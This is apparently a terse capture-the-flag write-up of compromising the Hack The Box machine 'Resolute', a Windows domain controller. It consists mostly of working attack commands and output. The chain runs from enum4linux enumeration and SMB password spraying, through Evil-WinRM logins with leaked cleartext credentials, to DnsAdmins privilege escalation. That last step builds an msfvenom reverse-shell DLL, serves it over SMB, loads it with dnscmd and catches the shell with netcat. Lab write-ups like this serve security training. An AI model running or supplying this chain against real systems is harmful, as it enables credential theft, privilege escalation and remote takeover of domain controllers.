enum4linux

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!

msfconsole
search smb_login
set rhost 10.10.10.169
set USER_FILE users
set SMBPass Welcome123!

[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'


sudo evil-winrm -u melanie -p 'Welcome123!' -i 10.10.10.169

user :)


*Evil-WinRM* PS C:\> dir -force


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        4/25/2020   8:13 PM      402653184 pagefile.sys


*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

sudo evil-winrm -u ryan -p 'Serv3r4Admin4cc123!' -i 10.10.10.169

Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

whoami /all

MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.142 LPORT=4444 --platform=windows -f dll > ~/home/bissorm/writeups/resolute-htb/shell.dll

python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /home/bissorm/writeups/resolute-htb/

terminal 1(evil-winrm:ryan)
terminal 2(smbserver.py)
terminal 3(nc)

terminal 3: nc -lvp 444

terminal 2: dnscmd.exe /config /serverlevelplugindll \\10.10.16.142\share\shell.dll
	    sc.exe stop dns
	    sc.exe start dns

terminal 3: reverse shell open


root! :)


